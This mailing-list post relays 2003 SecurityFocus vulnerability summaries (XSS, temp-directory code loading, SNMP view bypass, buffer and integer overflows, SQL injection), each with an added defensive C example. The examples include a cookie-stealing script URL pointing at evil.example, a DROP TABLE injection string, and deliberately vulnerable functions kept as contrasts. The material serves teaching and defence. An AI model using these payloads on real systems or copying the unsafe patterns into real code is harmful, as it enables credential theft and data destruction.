[gull-annonces] Résumé SecurityFocus Newsletter #214

Marc SCHAEFER schaefer at alphanet.ch
Sun Sep 21 15:11:02 CEST 2003


Python Publishing Accessories Error Messages Cross-Site Scri...
BugTraq ID: 8549
Remote: Yes
Date Published: Sep 05 2003
Relevant URL: http://www.securityfocus.com/bid/8549
Summary:
Python Publishing Accessories is a library of Python modules used to build
web publishing systems.

A vulnerability has been reported to exist because of the error messages
returned to a user in Python Publishing Accessories.  This issue may allow
a remote attacker to execute HTML or script code in a user's browser due
to insufficient sanitization of user input.

The problem is reported to exist because the software does not sanitize its
error messages.  When a request names an invalid URL, the vulnerable
software is reported to echo that URL in the error message returned to the
user without sanitizing it.  Any HTML or script code in the request is
therefore rendered in the user's browser, so an attacker can construct a
malicious link containing HTML or script code that is rendered in the
browser of any user who visits that link.  This attack would occur in the
security context of the affected site.

Successful exploitation of this vulnerability may allow an attacker to
steal cookie-based authentication credentials.  Other attacks may well be
possible.

This issue is reported to be present in Python Publishing Accessories
version 0.2.1, however prior versions may be affected as well.
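
The fix for this class of bug is to HTML-escape the request path before
interpolating it into the error page.  What follows is an added C example
written for this summary; it is not code from Python Publishing Accessories
or from the advisory.  The function names, the 404-page template and the
request URL are all constructed for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Escapes the characters that are significant in HTML text and attribute
 * context. Returns the length the escaped form needs (without the NUL);
 * output is truncated to fit but always NUL-terminated when outsz > 0. */
size_t html_escape(const char *in, char *out, size_t outsz)
{
    size_t need = 0, written = 0;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (outsz > 0 && written + rl < outsz) {
            memcpy(out + written, rep, rl);
            written += rl;
        }
        need += rl;
    }
    if (outsz > 0)
        out[written] = '\0';
    return need;
}

/* Vulnerable pattern (hypothetical template): the requested URL goes into
 * the error page verbatim, so "/<script>..." in the request becomes live
 * markup in the victim's browser. */
int not_found_page_unsafe(const char *url, char *out, size_t outsz)
{
    return snprintf(out, outsz, "<p>The URL %s was not found.</p>", url);
}

/* Hardened version: escape the attacker-controlled component first. */
int not_found_page_safe(const char *url, char *out, size_t outsz)
{
    char esc[2048];
    html_escape(url, esc, sizeof esc);
    return snprintf(out, outsz, "<p>The URL %s was not found.</p>", esc);
}

/* Returns 1 if the page still carries a raw <script> tag opener. */
int has_live_script(const char *page)
{
    return strstr(page, "<script") != NULL;
}

int main(void)
{
    /* Constructed sample: the kind of link an attacker would send a victim. */
    const char *url = "/<script>document.location='http://evil.example/?c='"
                      "+document.cookie</script>";
    char page[4096];

    not_found_page_unsafe(url, page, sizeof page);
    printf("unsafe: %s\n", page);
    not_found_page_safe(url, page, sizeof page);
    printf("safe:   %s\n", page);
    return 0;
}
```

The escaped output stays inert because "&lt;" is text, not a tag opener.
The same escaping is needed for every other reflected value (query string,
Referer, user-agent), not only the path.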

Apache::Gallery Insecure Local File Storage Privilege Escala...
BugTraq ID: 8561
Remote: No
Date Published: Sep 08 2003
Relevant URL: http://www.securityfocus.com/bid/8561
Summary:
Apache::Gallery is a Perl module designed to be used with Apache and
mod_perl. Its purpose is to create an index of picture thumbnails for
each directory hosted by the server.

When initializing Inline C from within the Gallery.pm file,
Apache::Gallery fails to store the generated files in a secure location.
Specifically, it calls File::Spec->tmpdir(), which typically returns a
world-writable temporary directory. This directory is then used to store
shared objects that are later linked into Apache. The .so files also have
predictable names, so an attacker can supply malicious shared object files
that will be linked into Apache.

An attacker could exploit this issue by constructing a malicious shared
object file. The file may need to contain specific functions expected by
Apache::Gallery to avoid errors. The attacker need only place these files
in the /tmp/lib/auto/Apache/Gallery_4033 directory, or whichever temporary
directory is in use, before Apache creates the shared object there. Note
that the shared object files must be in place before the Apache process
links to them.

This will result in malicious code being linked to and executed within the
Apache process, effectively allowing for the execution of arbitrary code
with elevated privileges.
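
A loader that writes generated shared objects should create its own private
directory rather than trust the process-wide temporary directory, and should
open each new file exclusively so that a pre-placed file causes a failure
instead of being linked in.  The following is an added C example of both
checks, not code from Apache::Gallery or Inline; the function names are
hypothetical and the directory is created under $TMPDIR (or /tmp) only for
the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

enum dir_verdict {
    DIR_OK = 0,
    DIR_MISSING,            /* lstat() failed */
    DIR_SYMLINK,            /* another user could point it elsewhere */
    DIR_NOT_DIR,
    DIR_FOREIGN_OWNER,      /* owned by neither us nor root */
    DIR_WRITABLE_BY_OTHERS  /* group/world writable: anyone can pre-place a .so */
};

/* The check Apache::Gallery lacked: refuse to load code from a directory
 * that other local users can write to. Caveat: a stat-then-use check is
 * racy (TOCTOU); owning a private directory, as below, is the real fix. */
enum dir_verdict dir_safe_for_code(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return DIR_MISSING;
    if (S_ISLNK(st.st_mode))
        return DIR_SYMLINK;
    if (!S_ISDIR(st.st_mode))
        return DIR_NOT_DIR;
    if (st.st_uid != geteuid() && st.st_uid != 0)
        return DIR_FOREIGN_OWNER;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return DIR_WRITABLE_BY_OTHERS;
    return DIR_OK;
}

/* Creates a fresh mode-0700 directory with an unpredictable name under
 * 'base' using mkdtemp(). Returns a malloc'd path, or NULL on failure. */
char *make_private_dir(const char *base)
{
    static const char suffix[] = "/gallery.XXXXXX";
    size_t n = strlen(base) + sizeof suffix;
    char *tmpl = malloc(n);
    if (tmpl == NULL)
        return NULL;
    snprintf(tmpl, n, "%s%s", base, suffix);
    if (mkdtemp(tmpl) == NULL) {
        free(tmpl);
        return NULL;
    }
    return tmpl;
}

/* Opens a new object file with O_EXCL, so a file an attacker pre-placed
 * under a predictable name (Gallery_<pid>.so) makes the open fail instead
 * of being silently reused. Returns a file descriptor or -1. */
int create_object_exclusively(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

int main(void)
{
    const char *base = getenv("TMPDIR");
    if (base == NULL)
        base = "/tmp";
    char *dir = make_private_dir(base);
    if (dir == NULL) {
        perror("mkdtemp");
        return 1;
    }
    printf("%s verdict=%d\n", dir, dir_safe_for_code(dir));
    printf("%s verdict=%d\n", base, dir_safe_for_code(base));
    rmdir(dir);
    free(dir);
    return 0;
}
```

On a typical system the second line reports DIR_WRITABLE_BY_OTHERS for /tmp
(mode 1777), which is exactly the situation File::Spec->tmpdir() hands back.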

Net-SNMP Unauthorized MIB Object Access Vulnerability
BugTraq ID: 8582
Remote: Yes
Date Published: Sep 06 2003
Relevant URL: http://www.securityfocus.com/bid/8582
Summary:
Net-SNMP is a freely available, open source implementation of the SNMP
protocol. It was previously known as UCD-SNMP, and is available for the
Unix and Linux operating systems.

Net-SNMP is prone to a vulnerability that may permit an existing user or
community to gain unauthorized access to MIB objects.  MIB objects that
are explicitly excluded from a user's or community's view may still be
accessed due to this vulnerability.  This could potentially allow
malicious parties to gain read/write access to information contained in a
restricted MIB.
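
The access decision at issue is view matching: a snmpd.conf line such as
"view restricted excluded .1.3.6.1.2.1.25" is supposed to override a broader
"view restricted included .1.3.6.1.2.1".  The following is an added C
example of that decision, not code from Net-SNMP: it implements the RFC 3415
rule that the most specific matching family decides (family masks are
omitted) and contrasts it with a naive first-include check that would expose
the excluded subtree.  The view and the OIDs are a constructed sample.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef unsigned long subid_t;            /* one OID sub-identifier */
enum view_type { VIEW_INCLUDED, VIEW_EXCLUDED };

struct view_entry {
    const subid_t *subtree;
    size_t len;
    enum view_type type;
};

static int is_prefix(const subid_t *pre, size_t plen,
                     const subid_t *obj, size_t olen)
{
    return plen <= olen && memcmp(pre, obj, plen * sizeof *pre) == 0;
}

/* Correct evaluation: among all families whose subtree is a prefix of the
 * requested object, the longest (most specific) one decides, so an
 * 'excluded' family nested inside an 'included' one denies access. An
 * object matched by no family is not in the view at all. Ties between
 * equal-length subtrees resolve to the later entry here. */
int view_allows(const struct view_entry *view, size_t n,
                const subid_t *obj, size_t olen)
{
    const struct view_entry *best = NULL;
    for (size_t i = 0; i < n; i++) {
        if (!is_prefix(view[i].subtree, view[i].len, obj, olen))
            continue;
        if (best == NULL || view[i].len >= best->len)
            best = &view[i];
    }
    return best != NULL && best->type == VIEW_INCLUDED;
}

/* Naive evaluation that grants access as soon as any 'included' family
 * matches and never consults 'excluded' entries. Shown only to make the
 * symptom described above concrete; it is not Net-SNMP's code. */
int view_allows_naive(const struct view_entry *view, size_t n,
                      const subid_t *obj, size_t olen)
{
    for (size_t i = 0; i < n; i++)
        if (view[i].type == VIEW_INCLUDED &&
            is_prefix(view[i].subtree, view[i].len, obj, olen))
            return 1;
    return 0;
}

/* Constructed sample view, equivalent to:
 *   view restricted included .1.3.6.1.2.1      (mib-2)
 *   view restricted excluded .1.3.6.1.2.1.25   (host resources) */
static const subid_t mib2_oid[] = { 1, 3, 6, 1, 2, 1 };
static const subid_t host_oid[] = { 1, 3, 6, 1, 2, 1, 25 };
const struct view_entry restricted_view[] = {
    { mib2_oid, 6, VIEW_INCLUDED },
    { host_oid, 7, VIEW_EXCLUDED },
};
const size_t restricted_view_len = 2;

int main(void)
{
    const subid_t hr_uptime[] = { 1, 3, 6, 1, 2, 1, 25, 1, 1, 0 }; /* hrSystemUptime.0 */
    printf("correct: %d  naive: %d\n",
           view_allows(restricted_view, restricted_view_len, hr_uptime, 10),
           view_allows_naive(restricted_view, restricted_view_len, hr_uptime, 10));
    return 0;
}
```

The point of the test vectors is that sysDescr.0 (under the included mib-2
subtree) is visible, hrSystemUptime.0 (under the excluded host subtree) is
not, and an object outside both families is denied by default.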

CmdFTP Store_Line() Heap Overflow Vulnerability
BugTraq ID: 8587
Remote: Yes
Date Published: Sep 08 2003
Relevant URL: http://www.securityfocus.com/bid/8587
Summary:
cmdftp is a command-line FTP client for Linux.

cmdftp has been reported prone to a remote heap overflow vulnerability.
The issue is reportedly due to insufficient bounds checking in store_line()
when handling FTP server directory listings. Excessive data returned by a
malicious FTP server in response to an 'ls' command may overflow a buffer
in heap memory and corrupt adjacent heap management structures. A remote
attacker may ultimately leverage this corruption to execute arbitrary
instructions in the context of the user running the vulnerable FTP client.

This vulnerability has been reported to affect all versions of cmdftp
prior to version 0.641.

Pine Message/External-Body Type Attribute Buffer Overflow Vu...
BugTraq ID: 8588
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8588
Summary:
Pine is a freely available, open source Mail User Agent.  It is
distributed by the University of Washington, and available for the Unix,
Linux, and Microsoft platforms.

A problem has been reported in Pine's handling of "message/external-body"
type attributes.  Because of this, an attacker may be able to gain
unauthorized access to a host running the vulnerable software.

The problem is in the parsing of the name/value pairs.  Due to improper
bounds checking, it is possible to supply a value in this field that
results in the overwriting of sensitive process memory.  An attacker can
exploit this with a custom string to execute arbitrary code with the
privileges of the Pine user.

Pine rfc2231_get_param() Remote Integer Overflow Vulnerabili...
BugTraq ID: 8589
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8589
Summary:
Pine is an e-mail client program used with Linux and Unix distributions.

It has been reported that Pine is prone to an integer overflow condition
resulting in possible memory corruption and leading to arbitrary code
execution.

The vulnerability exists in the rfc2231_get_param() function in strings.c,
which parses e-mail message headers with insufficient bounds checking.  The
condition is triggered when a vulnerable user opens a maliciously crafted
e-mail message sent by a remote attacker.  The resulting memory corruption
may allow the attacker to execute arbitrary code in the security context of
the user running the vulnerable version of Pine, and thereby gain
unauthorized access to the host.
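
Both Pine issues above sit in the same parser: the external-body attributes
are name/value pairs copied into fixed buffers, and RFC 2231 continuations
(name*0=..., name*1=...) have to be reassembled into one value whose length
is computed from attacker-supplied pieces.  The following is an added C
example, not code from Pine; it parses a Content-Type parameter list while
rejecting oversized pairs, and reassembles continuations with an
overflow-checked length sum.  The buffer sizes, function names and headers
are constructed for the illustration, and the charset-tagged form
(name*0*=...) is left out.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_PARAM_NAME  64
#define MAX_PARAM_VALUE 256
#define MAX_PARAMS      16

struct param { char name[MAX_PARAM_NAME]; char value[MAX_PARAM_VALUE]; };

/* Copy src[0..len) into a fixed field only if it fits; the caller rejects
 * the header otherwise. This check must precede every write into a fixed
 * name or value buffer. */
static int copy_bounded(char *dst, size_t cap, const char *src, size_t len)
{
    if (len >= cap) return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Parse the parameters of a header value such as
 *   message/external-body; access-type=anon-ftp; name="big.tar.gz"
 * Returns the parameter count, or -1 if a pair is malformed or oversized. */
int parse_params(const char *hdr, struct param *out, size_t max)
{
    const char *p = strchr(hdr, ';');
    size_t n = 0;
    while (p != NULL) {
        p += 1 + strspn(p + 1, " \t\r\n");
        if (*p == '\0') break;
        const char *eq = strchr(p, '=');
        if (eq == NULL || eq == p || memchr(p, ';', (size_t)(eq - p)) != NULL)
            return -1;                              /* bare or empty attribute */
        const char *ne = eq, *vs = eq + 1, *ve, *end;
        while (ne > p && (ne[-1] == ' ' || ne[-1] == '\t')) ne--;
        if (*vs == '"') {                           /* quoted-string value */
            if ((ve = strchr(vs + 1, '"')) == NULL) return -1;
            end = strchr(ve, ';');
            vs++;
        } else {                                    /* token value */
            end = strchr(vs, ';');
            ve = end ? end : vs + strlen(vs);
            while (ve > vs && strchr(" \t\r\n", ve[-1]) != NULL) ve--;
        }
        if (n >= max ||
            copy_bounded(out[n].name, sizeof out[n].name, p, (size_t)(ne - p)) < 0 ||
            copy_bounded(out[n].value, sizeof out[n].value, vs, (size_t)(ve - vs)) < 0)
            return -1;
        n++;
        p = end;
    }
    return (int)n;
}

/* Add a segment length to a running total, refusing to wrap (room for the
 * NUL is reserved so that malloc(total + 1) cannot wrap either). */
static int add_len(size_t *total, size_t len)
{
    if (len > SIZE_MAX - 1 - *total) return -1;
    *total += len;
    return 0;
}

/* Find the parameter named <base>*<seg>, an RFC 2231 continuation segment. */
static const struct param *find_segment(const struct param *ps, int n, const char *base, int seg)
{
    size_t blen = strlen(base);
    for (int i = 0; i < n; i++) {
        const char *s = ps[i].name;
        char *e;
        if (strncmp(s, base, blen) != 0 || s[blen] != '*') continue;
        long k = strtol(s + blen + 1, &e, 10);
        if (*e == '\0' && k == seg) return &ps[i];
    }
    return NULL;
}

/* Reassemble base*0, base*1, ... into one malloc'd string. The size is
 * summed with add_len() before anything is allocated or copied, so a
 * crafted header cannot make the total wrap and the copy outrun the buffer. */
char *join_continuations(const struct param *ps, int n, const char *base)
{
    size_t total = 0;
    int seg = 0;
    const struct param *s;
    while ((s = find_segment(ps, n, base, seg)) != NULL) {
        if (add_len(&total, strlen(s->value)) < 0) return NULL;
        seg++;
    }
    if (seg == 0) return NULL;
    char *out = malloc(total + 1), *w = out;
    if (out == NULL) return NULL;
    for (int i = 0; i < seg; i++) {
        s = find_segment(ps, n, base, i);
        memcpy(w, s->value, strlen(s->value));
        w += strlen(s->value);
    }
    *w = '\0';
    return out;
}
```

Rejecting rather than truncating is deliberate: a silently truncated
"name" attribute is how an external-body reference ends up pointing at the
wrong file.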

MySQL Password Handler Buffer Overflow Vulnerability
BugTraq ID: 8590
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8590
Summary:
MySQL is an open source relational database project. It is available for
the Microsoft Windows, Linux, and Unix operating systems.

MySQL server has been reported prone to a buffer overflow vulnerability
when handling user passwords of excessive size.

The issue is due to insufficient bounds checking on MySQL user passwords
stored in the 'Password' field of the 'User' table in a MySQL database. A
stored password value longer than 16 characters may overrun the bounds of
a reserved buffer in memory and corrupt adjacent memory. The overflow
occurs while acl_init() populates an ACL_USER instance, and may ultimately
result in the corruption of a saved instruction pointer.

An attacker with global administrative privileges on an affected MySQL
server may potentially exploit this condition to have arbitrary supplied
instructions executed in the context of the MySQL server.

This vulnerability has been reported to affect all versions of MySQL up to
and including 4.0.14 and 3.23.57.
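
The cmdftp listing overflow earlier in this issue and this MySQL password
overflow are the same defect in two places: an over-long, attacker-influenced
string copied into a fixed-size buffer, once on the heap and once inside a
struct.  The following is an added C example, not code from cmdftp or MySQL:
a listing-line store that measures before it allocates and enforces a
maximum, and an ACL loader that refuses a stored password hash of the wrong
length instead of copying it.  The names, the 16-byte field (the pre-4.1
scramble is 16 hex characters) and the sample inputs are illustrative.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

#define MAX_LISTING_LINE 4096   /* sane cap for one 'ls' line from a server */
#define SCRAMBLE_LENGTH  16     /* length of a pre-4.1 MySQL password hash */

/* Vulnerable shape (illustrative, not cmdftp's code): a fixed heap buffer
 * filled by strcpy() from whatever the server sent. Never called here. */
char *store_line_unsafe(const char *line)
{
    char *buf = malloc(256);
    if (buf != NULL)
        strcpy(buf, line);              /* overflows for any line > 255 bytes */
    return buf;
}

/* Hardened: find the terminator within the cap first, reject over-long
 * lines, and allocate exactly what is needed. */
char *store_line(const char *line)
{
    const char *nul = memchr(line, '\0', MAX_LISTING_LINE + 1);
    if (nul == NULL) {
        errno = EMSGSIZE;               /* server sent more than we accept */
        return NULL;
    }
    size_t len = (size_t)(nul - line);
    char *buf = malloc(len + 1);
    if (buf == NULL)
        return NULL;
    memcpy(buf, line, len + 1);
    return buf;
}

struct acl_user {
    char host[64];
    char user[32];
    char password[SCRAMBLE_LENGTH + 1];
};

/* Loads the Password column into the fixed field. An administrator can
 * write any string into the table, so the value is validated against the
 * format the server expects (empty, or 16 hex digits) instead of being
 * trusted. Returns 0 on success, -1 if the stored value is rejected. */
int acl_set_password(struct acl_user *u, const char *stored)
{
    size_t len = strlen(stored);
    if (len != 0 && len != SCRAMBLE_LENGTH)
        return -1;
    if (len != 0 && strspn(stored, "0123456789abcdefABCDEF") != len)
        return -1;
    memcpy(u->password, stored, len + 1);
    return 0;
}
```

Rejecting the row is preferable to truncating it: a truncated hash would
silently change which password authenticates that account.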

Asterisk CallerID Call Detail Records SQL Injection Vulnerab...
BugTraq ID: 8599
Remote: Yes
Date Published: Sep 11 2003
Relevant URL: http://www.securityfocus.com/bid/8599
Summary:
Asterisk is a software-based PBX system, which is available for Linux
operating systems. Asterisk includes support for various protocols
including SIP, IAX v1 and v2, and H323. Its call records can be stored in
a relational database.

Call Detail Records (CDR) are used by telephone systems to record various
user data. This includes a variety of information, such as the CallerID
data.

Asterisk is prone to SQL injection attacks via malformed CDR data. The
vulnerability occurs due to insufficient sanitization of user-supplied
CallerID data and could allow for the execution of SQL commands on the
system hosting Asterisk. This could potentially be exploited by an
attacker to influence the logic of SQL queries or to exploit
vulnerabilities in the underlying database. Other attacks may also be
possible.

For an attacker to exploit this issue, it would have to be possible for
them to modify the CallerID data sent out by their phone system.
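
The CDR is written with a statement of the form INSERT INTO cdr (...) VALUES
('<callerid>', ...); if the CallerID string is pasted into that literal
unescaped, a caller who controls it controls the statement.  The following
is an added C example, not code from Asterisk or its CDR modules: it
contrasts the unescaped build with one that escapes each literal following
the character set mysql_real_escape_string() uses for single-byte charsets.
Bound parameters are the stronger fix where the client library offers them,
and multibyte charsets such as GBK need the connection-aware library call.
The table layout and the CallerID value are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Escapes 's' for use inside a single-quoted MySQL string literal.
 * Returns the escaped length, or -1 if 'out' is too small. */
int sql_escape(const char *s, char *out, size_t outsz)
{
    size_t w = 0;
    for (; *s; s++) {
        char esc = 0;
        switch (*s) {
        case '\\':   esc = '\\'; break;
        case '\'':   esc = '\''; break;
        case '"':    esc = '"';  break;
        case '\n':   esc = 'n';  break;
        case '\r':   esc = 'r';  break;
        case '\x1a': esc = 'Z';  break;
        }
        size_t need = esc ? 2 : 1;
        if (w + need >= outsz)
            return -1;
        if (esc)
            out[w++] = '\\';
        out[w++] = esc ? esc : *s;
    }
    out[w] = '\0';
    return (int)w;
}

/* Vulnerable pattern: CallerID interpolated straight into the literal. */
int build_cdr_insert_unsafe(const char *callerid, const char *src,
                            const char *dst, char *q, size_t qsz)
{
    return snprintf(q, qsz,
                    "INSERT INTO cdr (clid, src, dst) VALUES ('%s', '%s', '%s')",
                    callerid, src, dst);
}

/* Hardened: every caller-controlled field is escaped before interpolation. */
int build_cdr_insert(const char *callerid, const char *src,
                     const char *dst, char *q, size_t qsz)
{
    char c[512], s[512], d[512];
    if (sql_escape(callerid, c, sizeof c) < 0 ||
        sql_escape(src, s, sizeof s) < 0 ||
        sql_escape(dst, d, sizeof d) < 0)
        return -1;
    return snprintf(q, qsz,
                    "INSERT INTO cdr (clid, src, dst) VALUES ('%s', '%s', '%s')",
                    c, s, d);
}

/* Counts unescaped single quotes (literal delimiters) in a built query.
 * A well-formed three-value INSERT has exactly six. */
int count_literal_delimiters(const char *q)
{
    int n = 0;
    for (; *q; q++) {
        if (*q == '\\' && q[1] != '\0') { q++; continue; }
        if (*q == '\'') n++;
    }
    return n;
}

int main(void)
{
    /* Constructed hostile CallerID, as a caller-controlled display name. */
    const char *clid = "Alice', '100', '200'); DROP TABLE cdr; --";
    char q[1024];
    build_cdr_insert_unsafe(clid, "1001", "2002", q, sizeof q);
    printf("unsafe (%d delimiters): %s\n", count_literal_delimiters(q), q);
    build_cdr_insert(clid, "1001", "2002", q, sizeof q);
    printf("safe   (%d delimiters): %s\n", count_literal_delimiters(q), q);
    return 0;
}
```

Whether the injected second statement actually executes depends on the
client API allowing multiple statements per call; even where it does not,
the attacker still rewrites the VALUES list of the record being stored.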


